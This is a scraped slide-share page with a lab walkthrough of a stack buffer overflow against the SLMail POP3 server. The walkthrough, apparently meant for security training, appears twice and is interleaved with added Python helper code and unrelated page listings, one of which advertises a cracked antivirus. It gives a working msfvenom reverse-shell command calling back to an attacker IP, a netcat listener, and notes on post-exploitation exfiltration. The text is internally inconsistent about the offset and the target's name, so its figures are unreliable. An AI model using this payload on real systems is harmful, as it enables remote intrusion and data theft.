Exploiting SLMail by Stack Based Buffer Overflow
Eric Alleshouse -- Independent Security Researcher
ralleshouse@gmail.com
April 27 2017
How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow
Table of Contents
How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow
Introduction
Lab setup
Immunity configuration
Simple buffer test
Nmap scan
Crashing the program
A unique string
Finding EIP memory location
Controlling EIP
The bytearray
Truncation
JMP ESP
The final exploit compiled
Shell received
A special thanks goes out to Aryan Guenthner, Penetration Tester, who has guided and encouraged me to ‘Try Harder’ at succeeding with this project and to produce this report.
Introduction
SLMail is SMTP and POP3 email server software for Microsoft Windows NT and 2000. It was meant to be a framework for an email solution and was written without an emphasis on security in its development. As a result, the length of user input is never checked against the size of the receiving buffer, which results in a stack-based buffer overflow. This vulnerability is exploitable and allows me to gain a remote shell on the system and extract sensitive documents from it.
If these instructions are followed, the same results will be reproduced.
SLMail can be downloaded from the link given in the Lab setup section.
Lab setup
I’m using the VirtualBox hypervisor with Kali 2016.2 and Windows 7 virtual machines. Installed on the Windows machine is the SLmail POP3 server and Immunity Debugger, with the mona.py script placed in the PyCommands folder within Immunity Debugger. The firewall in Windows has been turned off to simulate a plausible real-world security misconfiguration. Perhaps the firewall was disabled for troubleshooting purposes and forgotten about, among other scenarios that amount to a misconfiguration. This exercise shows a consequence of failing to audit a system: the system is exploited and sensitive files are exposed. If the instructions in this document are followed, the results will be reproduced.
SLmail can be downloaded from http://download.cnet.com/SLmail/3000-18506_4-10002446.html
Kali can be downloaded from http://www.kali.org
Immunity Debugger: https://www.immunityinc.com/products/debugger/index.html
VirtualBox: https://www.virtualbox.org/wiki/Downloads
Mona.py (which is placed in the PyCommands folder in Immunity): https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
The goal of the exercise is to redirect the EIP memory address to a JMP ESP address which will
lead the execution flow into a shellcode which I injected into memory, allowing me to browse the
remote system and extract sensitive data.
As a side note, my host machine is a MacBook Pro, and I have found a limitation for drag and drop between host and guest, so the workaround is to create a shared folder on the host that is accessible by the VMs. Netcat will also work to transfer files, but takes a little more time to set up because it is not a native program within Windows.
Once the VMs are set up, I made sure they are on the ‘host only’ network so they are kept from being exposed to the internet.
The VMs should be on the same network and able to ping each other. It is a good idea to start up the SLmail service and try connecting to it with netcat to be sure it is accepting inbound connections. To do this, issue the command:
nc 192.168.56.101 110
(The IP address is that of the Windows machine, and the port it connects to is 110.) You will see the POP3 server's banner, ready to accept commands, if the connection is successful.
Immunity debugger should be started up and attached to the SLmail process and
running so that the memory locations and dumps can be observed.
Click File - Attach - SLmail.
Within Immunity Debugger, set the working folder to c:\logs by issuing the command:
!mona config -set workingfolder c:\logs
All logs and files created by Mona will be found there.
First, I need to verify the crash of the application by using a poc.py script to fuzz the application.
The exploit will send 3000 ‘A’s to the server and crash it, to verify that there is a vulnerability
within SLmail.
A snapshot of the whole exploit is shown below. It is written in Python and imports the socket module to make a connection to the remote Vulnserver. It sends 3000 ‘A’s along with the ‘PASS’ and ‘USER username’ lines which the server takes as input. The server IP in the script is the IP address of my Windows machine where the vulnerable server resides, and the port it uses is 110, which I found from a simple nmap scan of the IP address.
Initial exploit
Nmap scan of the ip address
After sending this exploit from Kali, the result shows that the program crashes and ESP points at many ‘A’s, or ‘41’ in hex. This shows that the input length is not checked, as I can inject my own data into the program and cause it to crash. Each time the program is crashed, SLmail needs to be restarted and its process re-attached to Immunity.
Program crash with 3000 ‘A’s in memory
In order to find the specific location of EIP, a unique string needs to be sent to the program and the offset located from the debugger.
Use the Immunity command !mona pc 3000 to create a unique string of characters. There is also a tool within Kali that can be used, located at /usr/share/metasploit-framework/tools/exploit/pattern_create.
Copy the unique string into the exploit and send it to the vulnserver, i.e. exploit = 'Aa0Aa1Aa2Aa....' instead of the ‘A’s.
The unique pattern string will be found in the c:\logs working folder after using the mona command.
Or from Kali
Note the exploit was changed from ‘A’s to the unique string created. Then it was sent to the vulnserver to
crash again.
Server crash and unique string shown in memory dump
After the system crashes, I locate the position of EIP. To find it, I issued the Immunity command !mona po 396f4338 (or use the Kali tool /usr/share/metasploit-framework/tools/exploit/pattern_offset -q 296f4338 to find its location). The location was found at position 2606. This will become my offset in the exploit.
eg. !mona po 396f4338
The unique pattern found in EIP is located at position 2606.
EIP will be the next 4 bytes in memory, so the pattern offset now becomes 'A'*2006 + 'B'*4. Run the script again to verify control of EIP by noting that four ‘B’s get written to the EIP register.
EIP register has ‘42’ or ‘B’s written to it
The four ‘B’s at the end of the ‘A’s are found and this confirms control over the EIP register.
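To make the arithmetic behind !mona pc / !mona po (and pattern_create / pattern_offset) visible, here is an added Python example; it is not part of the original report and not mona's or Metasploit's code. It regenerates the same cyclic pattern those tools produce, maps the EIP value the report reads from the debugger (0x396f4338) back to its position in the pattern, and packs the report's JMP ESP address little-endian while checking that none of its bytes is one of the bad characters found later. The function names, the 3000-byte default length and the bad-character default are my own choices.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits


def cyclic_pattern(length):
    """Generate the same non-repeating pattern as pattern_create / !mona pc.

    The pattern walks every Upper+lower+digit triple (Aa0, Aa1, ..., Zz9) and
    is cut to the requested length.  Within the full 20,280-byte pattern every
    4-byte window is unique, so a register value read after the crash maps
    back to exactly one position in the input.
    """
    out = bytearray()
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(register_value, length=3000):
    """Offset of a crashed 32-bit register value inside the pattern.

    Equivalent of `pattern_offset -q <value>` / `!mona po <value>`.  x86 is
    little-endian, so the 4 bytes of the pattern that overwrote EIP are read
    back in reverse: 0x396f4338 -> b"8Co9".
    """
    needle = struct.pack("<I", register_value)
    offset = cyclic_pattern(length).find(needle)
    if offset < 0:
        raise ValueError(f"{register_value:#010x} does not occur in a {length}-byte pattern")
    return offset


def pack_address(addr):
    """Pack a 32-bit address the way it must appear in the buffer (little-endian)."""
    return struct.pack("<I", addr)


def bad_bytes_in(packed, bad_chars=b"\x00\x0a\x0d"):
    """Bytes of a packed value that collide with the bad characters.

    A return address containing a bad byte is as useless as shellcode that
    does, so it is worth checking before the address is used.
    """
    return [b for b in packed if b in bad_chars]


if __name__ == "__main__":
    # The EIP value from the report's `!mona po` command resolves to the
    # 'A'*2006 padding used in its final buffer layout.
    print("offset of 0x396f4338:", pattern_offset(0x396f4338))
    packed = pack_address(0x5F4B41E3)          # JMP ESP address from the report
    print("packed JMP ESP:", packed, "bad bytes:", bad_bytes_in(packed))
```

Calling pattern_offset with a value that is not in the pattern raises instead of returning -1, which is the usual sign that the register was overwritten by something other than the pattern (for example a pointer into the stack rather than the pattern itself).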
Next, I need to examine which bytes will cause problems within SLmail, such as truncation, and render my exploit code useless.
I use the Immunity command !mona bytearray -b "\x00" to create a list of all possible byte values without the 00 character, which is a null byte and will cause truncation. The file is saved to c:\logs. I copied the string into the exploit, placed it after the offset, and watched for any further truncation caused by other bad characters, eliminating them one by one until a clean set of characters can be passed to the program without issue. Below, all possible hex characters minus 00 are illustrated. The picture with truncation happening shows that the 0A character is causing problems: everything after it appears in memory as a run of 00’s, so it will be removed. After removal of each character, the exploit is re-run to view the output in memory. It is important to remove these bad characters so that the shellcode will run successfully.
Send the byte array from the exploit as offset = 'A'*2006 + 'B'*4 + badchars (the bytearray) to see whether any characters from the array cause truncation.
Offset and badchars are sent to the Vulnserver to test for truncation.
Truncation happening. Notice the truncation after 09.
After the bad characters \x00\x0a\x0d are removed there is no more truncation. The hex string is successfully inserted into the memory buffer without problems. These bytes will be excluded when creating the shellcode with msfvenom later in the exercise.
No more truncation
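The remove-and-resend loop described above can be written down as code. The following is an added Python example, not code from the report or from mona: make_bytearray reproduces the byte array that !mona bytearray -b "\x00" writes, first_bad_char is the comparison of the bytes sent against the memory dump that the report does by eye (mona's !mona compare automates the same comparison), and find_bad_chars repeats the send, inspect, remove cycle until the copy is clean. simulated_target is a constructed stand-in for the vulnerable copy routine; it stops at NUL and line-ending bytes so that it reproduces the report's outcome of \x00\x0a\x0d, and is not derived from SLmail's actual code. All function names are my own.

```python
def make_bytearray(exclude=(0x00,)):
    """Every byte value except the excluded ones, in ascending order.

    Mirrors `!mona bytearray -b "\\x00"`: the null byte is left out up front
    because it terminates C strings and would truncate the copy immediately.
    """
    return bytes(b for b in range(256) if b not in exclude)


def first_bad_char(sent, dump):
    """Compare what was sent with what landed in memory.

    Returns the first sent byte that was not copied faithfully (the dump
    diverges or stops there), or None when the dump matches the sent bytes.
    """
    for sent_byte, dump_byte in zip(sent, dump):
        if sent_byte != dump_byte:
            return sent_byte
    if len(dump) < len(sent):            # dump cut short: next byte never arrived
        return sent[len(dump)]
    return None


def simulated_target(data, line_terminators=b"\x0a\x0d"):
    """Constructed stand-in for the vulnerable copy (not SLmail's code).

    The input is treated as a line of text: copying stops at the first NUL or
    line-ending byte and the rest of the destination stays zero-filled, which
    is the run of 00's visible in the report's memory dump after 09.
    """
    for i, b in enumerate(data):
        if b == 0 or b in line_terminators:
            return data[:i] + b"\x00" * (len(data) - i)
    return data


def find_bad_chars(send, exclude=(0x00,)):
    """Repeat the report's procedure until no byte is mangled.

    `send` takes the bytes to send and returns the bytes found in memory.
    Returns the bad characters discovered, in the order they were found,
    not counting those excluded up front.
    """
    bad = list(exclude)
    while True:
        sent = make_bytearray(bad)
        found = first_bad_char(sent, send(sent))
        if found is None:
            return bad[len(exclude):]
        bad.append(found)              # remove it and resend, as the report does


if __name__ == "__main__":
    # Round one by hand: the first divergence is at 0x0a, right after 09.
    arr = make_bytearray()
    print("first bad byte:", hex(first_bad_char(arr, simulated_target(arr))))
    # The full loop finds 0x0a and then 0x0d, giving the set \x00\x0a\x0d.
    print("bad chars:", [hex(b) for b in find_bad_chars(simulated_target)])
```

The one-at-a-time loop matters because a bad byte hides everything after it: 0x0d is only visible once 0x0a has been removed, which is why the report re-runs the exploit after each removal rather than reading all the bad characters from a single dump.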
Use the Immunity command !mona modules -o to list the modules loaded with SLmail, and double click on one that has neither ASLR nor DEP enabled. ASLR randomizes the address at which a module (and therefore its JMP ESP instruction) is loaded, and DEP prevents code on the stack from being executed; both are security protections that would defeat this technique. I chose SLmail.exe. The -o option filters out the operating system modules to whittle the module list down to relevant listings.
Click on the ‘e’ at the top to list the modules available and locate the SLmail.exe module and
double click on it to jump to the slmail dlls.
Working within SLmail.exe indicated in the title of the window
Use the Immunity command !mona find -s '\xff\xe4' -m .dll to find the location of a JMP ESP instruction (FF E4 is its opcode).
The JMP ESP in my case is located at 5F4B41E3. Written in little-endian format, it becomes '\xe3\x41\x4b\x5f' in the exploit (I replace the ‘B’s with the JMP ESP address). Since I control EIP, I can direct it to the JMP ESP address, slide down some no-operation instructions and fall into the malicious shellcode.
I verify the address by searching for that memory address in the debugger.
To create a payload in Kali without the bad characters and insert it as a variable in the script, I type:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.103 LPORT=443 -f py -a x86 --platform windows -b '\x00\x0a\x0d'
and insert the generated shellcode into my exploit.
The exploit becomes exploit = offset + JMP ESP + nops + buf, where:
offset is the padding that fills the buffer up to EIP;
JMP ESP is the address that overwrites EIP;
nops are sent to create a little space and make sure the shellcode is executed from memory;
buf is the shellcode created in Kali containing my reverse TCP shell (only a snippet of it is shown in the figure).
This is the final exploit with the shellcode.
Set up a netcat listener in Kali so the Windows machine has a place to connect to (nc -lvp 443).
Send the exploit ./poc.py to Vulnserver.
A shell is gained on the compromised Windows machine by exploiting a vulnerability in the SLmail code. There was no bounds check on the user input, so I was able to make the program crash and gain entry to the system from my shellcode. The next phase of the process would be post-exploitation, where I could perform data exfiltration, move laterally through various machines on the network, pass the hash, and show the impact of the exploit, but this will not be explored in this walkthrough. Other useful information can be gained from computers, routers, printers etc.
System information gathered
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Eric D. Schabell
 
Designing AI-Powered APIs on Azure: Best Practices& Considerations
Designing AI-Powered APIs on Azure: Best Practices& ConsiderationsDesigning AI-Powered APIs on Azure: Best Practices& Considerations
Designing AI-Powered APIs on Azure: Best Practices& Considerations
Dinusha Kumarasiri
 
Why Orangescrum Is a Game Changer for Construction Companies in 2025
Why Orangescrum Is a Game Changer for Construction Companies in 2025Why Orangescrum Is a Game Changer for Construction Companies in 2025
Why Orangescrum Is a Game Changer for Construction Companies in 2025
Orangescrum
 
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage DashboardsAdobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
BradBedford3
 
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
Egor Kaleynik
 
Expand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchangeExpand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchange
Fexle Services Pvt. Ltd.
 
Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025
mu394968
 
Ad

Slmail Buffer Overflow

  • 3. **A special thanks goes out to Aryan Guenthner, Penetration Tester, who has guided and encouraged me to 'Try Harder' at succeeding with this project and to produce this report.**
    Introduction
    SLMail is SMTP and POP3 email server software for Microsoft™ Windows NT and 2000. It was meant to be a framework for an email solution and was written without an emphasis on security in its development. As a result, the length of user input is not checked against the receiving buffer, resulting in a buffer overflow. This vulnerability is exploitable and allows me to gain a remote shell on the system and extract sensitive documents from it. If these instructions are followed, the same results will be reproduced. SLMail can be downloaded here.
    Lab setup
    I'm using the VirtualBox hypervisor with Kali 2016.2 and Windows 7 virtual machines. Installed on the Windows machine are the SLmail POP3 server and Immunity Debugger, with the mona.py script placed in the PyCommands folder within Immunity Debugger. The Windows firewall has been turned off to simulate a real-world security misconfiguration: perhaps the firewall was disabled for troubleshooting purposes and forgotten about, among other scenarios that represent a misconfiguration. This exercise shows a consequence of failing to audit a system: exploitation of the system and exposure of sensitive files. If the instructions in this document are followed, the results will be reproduced.
  • 4. SLmail can be downloaded from http://download.cnet.com/SLmail/3000-18506_4-10002446.html
    Kali can be downloaded from http://www.kali.org
    Immunity Debugger: https://www.immunityinc.com/products/debugger/index.html
    VirtualBox: https://www.virtualbox.org/wiki/Downloads
    Mona.py (which is placed in the PyCommands folder in Immunity): https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
    The goal of the exercise is to redirect EIP to the address of a JMP ESP instruction, which will lead the execution flow into shellcode I injected into memory, allowing me to browse the remote system and extract sensitive data.
    As a side note, my host operating system runs on a MacBook Pro, and I have found a limitation with drag and drop between host and guest; the workaround is to create a shared folder on the host that is accessible by the VMs. Netcat will also work to transfer files, but takes a little more time to set up because it is not a native program within Windows.
    Once the VMs are set up, I made sure they are on the 'host only' network so they are kept from being exposed to the internet. The VMs should be on the same network and able to ping each other. It is a good idea to start the SLmail service and try connecting to it with netcat to be sure it is accepting inbound connections. To do this, issue the command: nc 192.168.56.101 110 (the IP address is that of the Windows machine, and the port it connects to is 110). You will see the POP server ready to accept instructions if successful.
    Immunity Debugger should be started and attached to the SLmail process, and the process left running, so that the memory locations and dumps can be observed.
  • 5. Click File - Attach - SLmail. Within Immunity Debugger, set the working folder to c:\logs by issuing the command:
    !mona config -set workingfolder c:\logs
    All logs and documents created by Mona will be found there.
    First, I need to verify the crash of the application by using a poc.py script to fuzz it. The script will send 3000 'A's to the server and crash it, to verify that there is a vulnerability within SLmail.
  • 6. A snapshot of the whole exploit is shown below. It is written in Python and imports the socket module to make a connection to the remote Vulnserver. It sends 3000 'A's along with 'PASS' and 'USER username', which the server takes as input. The server IP in the script is the IP address of my Windows machine where Vulnserver resides, and the port it uses is 110, which I found from a simple nmap scan of the IP address.
    Initial exploit
  • 7. Nmap scan of the IP address
    After sending this exploit from Kali, the result shows that the program crashes and ESP contains many 'A's, or '41' in hex. This shows that the boundary hasn't been checked, as I can inject my own data into the program and cause it to crash. Each time the program is crashed, SLmail needs to be restarted and its process re-attached to Immunity.
  • 8. Program crash with 3000 'A's in memory
    In order to find the specific offset at which EIP is overwritten, a unique string needs to be sent to the program and the offset located from the debugger. Use the Immunity command !mona pc 3000 to create a unique string of characters. There is also a tool within Kali that can be used, located at /usr/share/metasploit-framework/tools/exploit/pattern_create. Copy the unique string into the exploit and send it to the vulnserver, i.e. exploit = 'Aa0Aa1Aa2Aa....' instead of the 'A's. The unique pattern string will be found in the c:\logs working folder after using the mona command, or from Kali.
  • 9. Note that the exploit was changed from 'A's to the unique string created. Then it was sent to the vulnserver to crash it again.
  • 10. Server crash and unique string shown in memory dump
    After the system crashes, I locate the position of EIP. To find it, I issued the Immunity command !mona po 396f4338 (or use the Kali tool /usr/share/metasploit_framework/tools/exploit/pattern_offset -q 296f4338 to find its location). The location was found at position 2606. This will become my offset in the exploit.
    e.g. !mona po 396f4338
    The unique pattern found in EIP is located at position 2606. EIP will be the next 4 bytes in memory, so the pattern offset now becomes 'A'*2006 + 'B'*4 (run the script again to verify control of EIP by noting that 4 'B's get written to the EIP register).
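What !mona po and pattern_offset -q are computing in this step, as an added example that is not the author's poc.py: it builds the same Aa0Aa1... pattern, reverses the EIP value as the debugger displays it into the little-endian bytes that actually landed in memory, and searches for them, which gives the 2006 used in 'A'*2006; the mistyped 296f4338 is shown returning no match.

```python
"""Cyclic pattern and offset lookup, mirroring `!mona pc` / pattern_create
and `!mona po` / pattern_offset -q from the walkthrough. Added example,
not the author's poc.py."""
import string
import struct

# Metasploit's three character classes; the innermost loop is the digit.
UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length: int) -> str:
    """Build the 'Aa0Aa1Aa2...' pattern of exactly `length` characters.
    Every 4-byte window is unique, which is what makes the offset lookup
    unambiguous (up to 26*26*10*3 = 20280 bytes)."""
    chunks = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("a pattern longer than 20280 bytes would repeat")


def pattern_offset(pattern: str, eip_hex: str):
    """Return the offset at which the 4 bytes now in EIP were sent, or None.
    `eip_hex` is the register value as the debugger displays it (e.g.
    '396f4338'); x86 is little-endian, so the bytes that overwrote the
    saved return address are that value reversed: 38 43 6f 39 = '8Co9'."""
    needle = struct.pack("<I", int(eip_hex, 16)).decode("latin-1")
    idx = pattern.find(needle)
    return None if idx < 0 else idx
```

A value that does not come back as an offset (None) means the bytes in EIP were not part of the pattern, which is the first thing to check before trusting any offset.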
  • 11. EIP register has '42' or 'B's written to it
    The four 'B's at the end of the 'A's are found, and this confirms control over the EIP register. Next, I need to examine which bytes will cause problems within SLmail, such as truncation, and render my exploit code useless. I use the Immunity command !mona bytearray -b "\x00" to create a list of all possible byte values without the 00 byte, which is a null byte and will cause truncation. The file will be saved to c:\logs. I copied the string into the exploit and placed it after the offset to view any further truncation caused by other bad characters, and eliminate them one by one until a clean set of characters can be passed to the program without issue.
    Below are illustrated all possible hex characters minus 00. The picture with truncation happening shows that the 0A character is causing problems, indicated by a run of 00's afterward, and it will therefore be removed. After removal of each bad character, the exploit is re-run to view the output in memory. It is important to remove these bad characters so that the shellcode will run successfully.
  • 12. Send the byte array from the exploit: offset = 'A'*2006 + 'B'*4 + badchars (the bytearray) to see if there is any truncation caused by characters from the array.
    Offset and badchars are sent to the Vulnserver to test for truncation.
  • 13. Truncation happening. Notice the truncation after 09.
    After the bad characters \x00\x0a\x0d are removed there is no more truncation. The hex string is successfully inserted into the memory buffer without problems. These bytes will be excluded when creating the shellcode with msfvenom later on in the exercise.
    No more truncation
    Use the Immunity command !mona modules -o to find the modules loaded by SLmail that can be used, and double-click on one that doesn't have ASLR or DEP enabled (ASLR randomizes where the module, and so the JMP ESP, is loaded, and DEP marks the stack non-executable; both are security mitigations). I chose SLmail.exe. The -o option filters out the operating system modules to whittle the module list down to relevant listings.
  • 14. Click on the 'e' button at the top to list the modules available, locate the SLmail.exe module and double-click on it to jump to the SLmail DLLs.
    Working within SLmail.exe, as indicated in the title of the window
  • 15. Use the Immunity command !mona find -s '\xff\xe4' -m .dll to find the location of a JMP ESP instruction (\xff\xe4 is its opcode). The JMP ESP in my case is located at 5F4B41E3. Written in little endian format, it becomes '\xe3\x41\x4b\x5f' in the exploit (I replace the 'B's with the JMP ESP address). Since I control EIP, I can direct it to the JMP ESP address, slide down some no-operation instructions and fall into the malicious shellcode. I verify the address by searching for that memory address in the debugger.
    To create a payload in Kali without the bad characters and insert it as a variable in the script, I type:
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.103 LPORT=443 -f py -a x86 --platform windows -b '\x00\x0a\x0d'
    and insert the shellcode into my exploit. The exploit becomes exploit = offset + JMP ESP + nops + buf
    (offset is the padding just before EIP)
    (JMP ESP is the address written into EIP)
    (buf is the shellcode created in Kali, which contains my reverse TCP shell; in this case there is just a snippet of the shellcode)
    (nops are sent to create a little space and be sure that the shellcode gets run in memory)
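The bad-character triage from the truncation step (slides 11 to 13) together with the little-endian check on the JMP ESP address chosen here, as an added example rather than the author's code: SLmail's buffer copy is replaced by a constructed stand-in that stops at CR or LF and leaves 00s, so the remove-one-and-resend loop rediscovers \x0a and then \x0d exactly as the dumps showed, and 5F4B41E3 is packed the way it is written over EIP and checked against the bad set.

```python
"""Bad-character triage and return-address check for the SLmail walkthrough.
Added example; the stand-in for SLmail's buffer copy is CONSTRUCTED to
reproduce the behaviour seen in the dumps (truncation at 0x0a / 0x0d)."""
import struct

BUFFER_SIZE = 256  # size of the CONSTRUCTED stand-in buffer


def bytearray_without(bad) -> bytes:
    """Like !mona bytearray -b '\\x00': every byte value except the known bad ones."""
    return bytes(b for b in range(256) if b not in bad)


def first_bad_byte(sent: bytes, observed: bytes):
    """Compare the bytes sent with the bytes seen in the memory dump.
    The first position that differs (or is missing) names the next bad
    character; None means the whole array arrived intact."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def simulated_pop3_copy(data: bytes) -> bytes:
    """CONSTRUCTED stand-in for the vulnerable copy: the line-oriented
    server stops at CR or LF, and the rest of the buffer reads as 00s."""
    for stop in (b"\x0a", b"\x0d"):
        idx = data.find(stop)
        if idx >= 0:
            data = data[:idx]
    return data.ljust(BUFFER_SIZE, b"\x00")


def find_all_bad_chars(target=simulated_pop3_copy, initial_bad=(0x00,), max_rounds=10):
    """The remove-one-and-rerun loop from the walkthrough: resend the array
    without the bytes found so far until it lands in memory unchanged."""
    bad = set(initial_bad)
    for _ in range(max_rounds):
        sent = bytearray_without(bad)
        nxt = first_bad_byte(sent, target(sent))
        if nxt is None:
            return sorted(bad)  # e.g. [0x00, 0x0a, 0x0d]
        bad.add(nxt)
    raise RuntimeError("array still mangled after %d rounds" % max_rounds)


def little_endian_is_clean(addr: int, bad) -> bool:
    """Pack a candidate JMP ESP address exactly as it is written over EIP
    (little-endian) and confirm none of its four bytes is a bad character."""
    return not any(b in bad for b in struct.pack("<I", addr))
```

The same address check is worth running on any candidate from !mona find before editing the exploit: an address whose bytes include a bad character would be truncated just like the byte array was.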
  • 16. This is the final exploit with the shellcode.
  • 17. Set up a netcat listener in Kali so the Windows machine has a place to connect to (nc -lvp 443). Send the exploit ./poc.py to Vulnserver.
    A shell is gained on the compromised Windows machine by exploiting a vulnerability in the SLmail programming. There was no boundary check on the user input, so I was able to make the program crash and gain entry to the system from my shellcode. The next phase of the process would be post-exploitation, where I could perform data exfiltration, move laterally through various machines on the network, pass the hash, and show the impact of the exploit, but this will not be explored in this walkthrough. Other useful information can be gained from computers, routers, printers, etc.
  • 18. System information gathered